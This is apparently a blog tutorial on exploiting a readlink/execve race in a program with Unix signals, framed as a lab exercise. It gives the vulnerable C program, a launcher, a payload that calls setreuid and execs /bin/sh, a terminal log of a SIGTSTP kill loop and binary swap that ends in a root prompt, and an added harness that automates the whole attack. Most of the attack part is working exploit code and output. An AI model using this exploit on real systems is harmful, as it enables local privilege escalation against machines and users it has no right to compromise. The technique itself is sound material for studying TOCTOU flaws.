Race Condition Exploit with Unix Signal
This is the first time I have learned about a race condition exploit with Unix signals.
What a fresh idea!!
Example Code
#include <unistd.h>

int main(int argc, char *argv[]) {
    char buf[4096];
    if (argc < 2) {
        /* Step 1: resolve our own path. readlink() does not NUL-terminate. */
        ssize_t n = readlink("/proc/self/exe", buf, sizeof(buf) - 1);
        if (n < 0) return 1;
        buf[n] = '\0';
        /* Step 2: re-exec by that path with one argument, so the second run
           skips this block and returns 0. Whatever the path names at the
           moment execve() runs is what gets executed. */
        char *args[] = { buf, "1", 0 };
        if (execve(args[0], args, 0) < 0) return 1;
    }
    return 0;
}
// Sourced by StalkR
What this program does:
When argc is less than 2, it gets its own path (/proc/self/exe) with readlink(), then runs that path with execve(), passing "1" as an argument so that the second instance does nothing and exits.
That's all. Note that the path is resolved at one moment and used at a later one.
The first time I saw this source, I wondered: how could I exploit it? What could I use?
I searched, and finally found Race Condition Exploit with Unix Signal, written by pwn3r.
What is a Unix Signal?
Description of Unix signals: http://en.wikipedia.org/wiki/Unix_signal
In short, a signal is an asynchronous notification sent to a process (or to a specific thread) to tell it that an event occurred; each signal has a default action, such as terminating or stopping the process, unless the program installs its own handler.
The signal we use today is the terminal stop signal, the one Ctrl-Z delivers; its default action is to stop the process until it receives SIGCONT, and it can also be sent with kill(2):
SIGTSTP  20  Terminal stop signal (POSIX)
The idea is: deliver SIGTSTP to the program between readlink() and execve(), so it stops right there with the already-resolved path sitting in buf. While it is stopped, replace the file at that path with the program we actually want to run. When the process is continued, execve(buf) executes whatever the path names now. The check (readlink) and the use (execve) are separated in time, which is what makes this a race; the signal just lets us stretch a window of microseconds to as long as we like. The stop has to land after readlink() has returned: a process stopped earlier would resolve /proc/self/exe after the swap, get the unlinked original (its path then ends in " (deleted)"), and fail.
What we want to run is a program that executes /bin/sh.
So what we need to make is:
- a launcher that is not stopped by SIGTSTP itself and then starts rc (the signals come from a kill loop in another terminal)
- a program that executes /bin/sh
First, send SIGTSTP to stop the vulnerable program.
Then replace the program with the one that executes /bin/sh.
This is how the exploit goes:
#include <signal.h>
#include <stdio.h>
#include <unistd.h>

/* Runs when SIGTSTP arrives. Having a handler installed means the launcher
   is not stopped (the default action), and the handler interrupts sleep(). */
void signal_handler(int signo) {
    (void)signo;
    printf("Run~!\n");
}

int main() {
    signal(SIGTSTP, signal_handler);
    sleep(20);   /* wait here until the first SIGTSTP from the kill loop */
    /* execve() resets caught signals to SIG_DFL, so the next SIGTSTP stops rc.
       argv[0] only, so rc sees argc == 1 and takes the readlink/execve path. */
    execl("/home/Desktop/Lab/rc", "rc", (char *)0);
    return 1;
}
When SIGTSTP arrives, signal_handler runs (printing "Run~!"), sleep() returns early because a handler was invoked, and execl() replaces the process image with rc.
The handler is needed because the default action of SIGTSTP is to stop the process: without it, the first signal from the kill loop would stop the launcher itself before it ever reached execl(). execve() resets caught signals to their default disposition, so once rc is running, the next SIGTSTP does stop it, and we hope that happens between its readlink() and execve().
#include <unistd.h>

int main() {
    /* geteuid() is whatever effective uid the stopped rc carried into the
       execve() that landed here. Making the real uid match it keeps shells
       that drop a mismatched effective uid (bash does) from giving it up. */
    setreuid(geteuid(), geteuid());
    execl("/bin/sh", "sh", (char *)0);
    return 1;
}
Conclusion
Terminal 1
zero@ubuntu:~Desktop/Lab$ ./sig

Terminal 2
zero@ubuntu:~Desktop/Lab$ while :; do kill -20 <pid>; done

Terminal 1
Run~!
[1]+  Stopped                 ./sig

Terminal 2
zero@ubuntu:~Desktop/Lab$ ln -f ./shell ./rc

And continue the process...

Terminal 1
zero@ubuntu:~Desktop/Lab$ fg 1
./sig
#
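The same procedure can be driven by one program instead of two terminals. This is an added example, not code from the original post or from pwn3r's write-up: it forks and execs the victim, waits until the child really is the victim image, floods it with SIGTSTP until waitpid() reports a stop, swaps the binary the way `ln -f ./shell ./rc` does, and resumes it with SIGCONT. The paths ./rc and ./shell are the lab names used above and are assumptions here; both can be overridden on the command line.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <limits.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Poll /proc/<pid>/exe until it resolves to `exe` (the victim's real path).
   A stop that landed in our own fork()ed child before execl() would make it
   exec the swapped-in file as ourselves, which gains nothing. */
static int wait_for_exec(pid_t pid, const char *exe, long max_polls) {
    char procpath[64], target[PATH_MAX];
    snprintf(procpath, sizeof procpath, "/proc/%d/exe", (int)pid);
    for (long i = 0; i < max_polls; i++) {
        ssize_t n = readlink(procpath, target, sizeof target - 1);
        if (n < 0) return -1;                 /* child already exited */
        target[n] = '\0';
        if (strcmp(target, exe) == 0) return 0;
    }
    return -1;
}

/* Flood `pid` with the stop signal `sig` until waitpid() reports it stopped.
   Returns the number of signals sent, or -1 if the child exited first or the
   budget ran out. Stop sending once this returns: pending stop signals are
   discarded when SIGCONT is generated, but one sent after the resume would
   stop the child again. */
int stop_with_signal(pid_t pid, int sig, long max_tries) {
    for (long tries = 1; tries <= max_tries; tries++) {
        if (kill(pid, sig) < 0) return -1;
        int st;
        pid_t w = waitpid(pid, &st, WUNTRACED | WNOHANG);
        if (w < 0) return -1;
        if (w == pid) return WIFSTOPPED(st) ? (int)tries : -1;
    }
    return -1;
}

/* What `ln -f ./shell ./rc` does, but atomically: link the replacement under
   a temporary name, then rename() it over the victim's directory entry. The
   victim's old inode loses its last link; the stopped process still maps it. */
static int swap_binary(const char *victim, const char *replacement) {
    char tmp[PATH_MAX];
    snprintf(tmp, sizeof tmp, "%s.swap", victim);
    unlink(tmp);
    if (link(replacement, tmp) < 0) return -1;
    return rename(tmp, victim);
}

/* Self-check that needs no victim: stop a child that only pause()s, confirm
   the stop, resume it and terminate it. Uses SIGSTOP because Linux discards
   SIGTSTP sent to a process in an orphaned process group (no job-control
   shell above it), which is the usual situation under a test runner. */
int self_test(void) {
    pid_t pid = fork();
    if (pid < 0) return 0;
    if (pid == 0) { for (;;) pause(); }
    int ok = stop_with_signal(pid, SIGSTOP, 50000000L) > 0;
    kill(pid, SIGCONT);
    kill(pid, SIGTERM);
    int st;
    if (waitpid(pid, &st, 0) != pid || !WIFSIGNALED(st) || WTERMSIG(st) != SIGTERM) ok = 0;
    return ok;
}

int main(int argc, char **argv) {
    const char *victim = argc > 1 ? argv[1] : "./rc";          /* assumed lab path */
    const char *replacement = argc > 2 ? argv[2] : "./shell";  /* assumed lab path */
    char exe[PATH_MAX];
    if (!realpath(victim, exe)) { perror("realpath"); return 1; }

    pid_t pid = fork();
    if (pid < 0) { perror("fork"); return 1; }
    if (pid == 0) {
        execl(victim, victim, (char *)0);   /* argc == 1: rc takes the readlink/execve path */
        _exit(127);
    }
    if (wait_for_exec(pid, exe, 50000000L) < 0) { fputs("victim never exec'd\n", stderr); return 1; }
    int tries = stop_with_signal(pid, SIGTSTP, 50000000L);   /* SIGSTOP works as well */
    if (tries < 0) { fputs("missed: victim finished before it stopped\n", stderr); return 1; }
    printf("stopped after %d signal(s); swapping %s over %s\n", tries, replacement, victim);
    if (swap_binary(victim, replacement) < 0) { perror("swap"); return 1; }
    kill(pid, SIGCONT);   /* resumes into execve(buf); buf still holds the victim's path */
    int st;
    if (waitpid(pid, &st, 0) != pid) return 1;
    /* Exit status 1 from rc means the stop landed before readlink() returned:
       the path it then resolves ends in " (deleted)" and execve() fails.
       Anything else came from the swapped-in program. */
    if (WIFEXITED(st)) printf("child exited with status %d\n", WEXITSTATUS(st));
    return 0;
}
```

A run is a single attempt: the stop lands wherever the victim happens to be when the signal is delivered, and the dynamic loader's start-up is a far wider target than the few instructions between readlink() and execve(), so most attempts report exit status 1, and the original rc is replaced either way; keep a copy to restore in a lab. Linux discards SIGTSTP sent to a process in an orphaned process group, so run the harness from an interactive, job-controlled shell, or send SIGSTOP, which is never discarded (self_test() uses it for that reason). kill(2) permits an unprivileged user to signal any process whose real uid is their own, which is why a setuid rc started by the user can still be stopped by the user.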
This is the end.
Ref : http://pwn3r.tistory.com/entry/Docs-Exploiting-Race-Condition-Vulnerability-with-Unix-Signal
Epilogue
Race Condition Exploit with Unix Signal... cool exploit!